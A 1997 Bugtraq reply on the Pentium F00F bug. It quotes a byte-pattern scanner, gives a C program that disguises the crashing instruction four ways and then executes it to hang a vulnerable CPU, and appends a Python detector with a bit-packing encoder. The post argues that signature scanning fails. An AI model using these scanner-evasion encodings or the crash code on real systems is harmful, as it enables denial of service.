[5545] in bugtraq
Re: Intel Pentium Bug
daemon@ATHENA.MIT.EDU (Kragen "Skewed" Sitaker)
Mon Nov 10 18:59:36 1997
Date: Mon, 10 Nov 1997 07:35:16 -0500
Reply-To: "Kragen \"Skewed\" Sitaker" <kragen@DNACO.NET>
From: "Kragen \"Skewed\" Sitaker" <kragen@DNACO.NET>
X-To: Jason Parsons <root@SAFFRONCS.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.95.971109193537.3288A-100000@cayenne.saffroncs.com>
On Sun, 9 Nov 1997, Jason Parsons wrote:
> Re the F0 0F C7 C8 Pentium bug:
>
> I just wanted to repost this from the Linux-security list. Thought it
> might be helpful to some here. This was posted to Linux-security by Sam
> Trenholme <set@reality.samiam.org>.
> # $data holds the file contents; $dir/$file names the file being scanned
> if ($data =~ /\xf0\x0f\xc7\xc8/) {
>     print "$dir/$file contains F0 0F C7 C8\n";
> }
Is this intended to keep malicious people from crashing your computer?
It is trivial to defeat this, and it is impossible, in the general case,
to determine whether or not a program can compute f0 0f c7 c8 and execute
it.
Here are some trivial examples of ways to defeat it:
/*
 * Demonstrate a trivial way to crash a Pentium, f0 0f c7 c8
 *
 * Each array below holds the four bytes in a disguised form; the matching
 * fixup routine turns it back into f0 0f c7 c8 in place, and main() then
 * jumps to it.  Reaching the instruction requires that the data segment
 * be executable; with non-executable data the jump itself faults first.
 * On a processor without the bug the bytes simply raise an invalid-opcode
 * exception.
 */
#include <string.h>

/* Each byte stored one higher than its real value. */
char incr[] = "\xf1\x10\xc8\xc9";

void
fix_incr(char *s)
{
    for (; *s; s++)
        --*s;
}

/* The bytes stored back to front. */
char backwards[] = "\xc8\xc7\x0f\xf0";

void
reverse_inner(char *begin, char *end)
{
    while (end > begin) {
        char t = *end;
        *end = *begin;
        *begin = t;
        end--;
        begin++;
    }
}

void
reverse(char *s)
{
    reverse_inner(s, s + strlen(s) - 1);
}

/* Each byte XORed with 1: f1 0e c6 c9 ^ 01 = f0 0f c7 c8. */
char xored[] = "\xf1\x0e\xc6\xc9";

void
xor_pad(char *s, char pad)
{
    for (; *s; s++)
        *s ^= pad;
}

/* The bytes at odd offsets, with filler characters between them. */
char interleaved[] = { 'X', '\xf0', 'Y', '\x0f', 'Z', '\xc7', 'A', '\xc8',
                       '\0' };

void
deinterleave(char *s)
{
    char *t = s + 1;                /* payload bytes sit at odd offsets */

    while (*t) {
        *s++ = *t;
        if (*++t == '\0')           /* stop at the terminator, do not step past it */
            break;
        t++;
    }
    *s = '\0';
}

int
main(void)
{
    void (*f)(void);

    fix_incr(incr);
    reverse(backwards);
    xor_pad(xored, 1);
    deinterleave(interleaved);

    f = (void (*)(void)) incr;      /* or backwards, or xored, or interleaved */
    (*f)();
    return 0;
}
Now, none of these are very subtle. I could easily write something that
contained a piece of nonsense text, took the second-to-last bit from each
character, and assembled f1 0e c9 c8 from it. The possibilities are
endless.
A trusted-compiler system seems to be the only possible software
protection against attacks like these.
Kragen
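The byte-pattern scanner quoted at the top and the encodings Kragen lists, as an added Python example that is not part of the original post: a scanner with one rule per trivial transform (increment, reversal, single-byte XOR, interleaving), run over constructed samples, plus the bit-packing scheme he mentions to show that the rule set is never complete. The sample strings and the `bit1_packed` helper are this example's own constructions.

```python
from __future__ import annotations

# lock cmpxchg8b eax: the byte sequence the quoted Perl scanner greps for.
F00F = bytes.fromhex("f00fc7c8")


def encodings():
    """Yield (rule name, pattern) for the plain sequence and each trivial
    transform from the post: incremented bytes, reversal, single-byte XOR."""
    yield "plain", F00F
    yield "incremented", bytes((b + 1) & 0xFF for b in F00F)
    yield "reversed", F00F[::-1]
    for pad in range(1, 256):            # pad 0 would repeat the plain rule
        yield f"xor-{pad:02x}", bytes(b ^ pad for b in F00F)


def scan(data: bytes) -> list[str]:
    """Return the names of every rule that matches somewhere in data."""
    hits = [name for name, pattern in encodings() if pattern in data]
    # The interleaved form keeps the payload at every second byte; the
    # filler may start at an even or an odd offset, so check both phases.
    for phase in (0, 1):
        if F00F in data[phase::2]:
            hits.append(f"interleaved-phase{phase}")
    return hits


def bit1_packed(payload: bytes, text: bytes) -> bytes:
    """Hide each payload bit in bit 1 of successive text bytes, the
    'second-to-last bit' scheme the post describes. Constructed here only
    to show an encoding the rules above do not cover."""
    bits = [(b >> (7 - i)) & 1 for b in payload for i in range(8)]
    if len(text) < len(bits):
        raise ValueError("cover text too short for payload")
    packed = bytes((c & ~0x02) | (bit << 1) for c, bit in zip(text, bits))
    return packed + text[len(bits):]


# Constructed samples: the four disguises from the C program (the XOR one
# as f0 0f c7 c8 ^ 01) plus a bit-packed one inside harmless-looking text.
SAMPLES = {
    "incr": b"\xf1\x10\xc8\xc9",
    "backwards": b"\xc8\xc7\x0f\xf0",
    "xored": b"\xf1\x0e\xc6\xc9",
    "interleaved": b"X\xf0Y\x0fZ\xc7A\xc8",
    "packed": bit1_packed(F00F, b"this looks like harmless text to a byte scanner"),
}

if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name:12s} -> {scan(sample) or 'no match'}")
```

The 255 four-byte XOR patterns also raise the false-positive rate on arbitrary binaries, and each further encoding needs yet another rule, which is the point of the post.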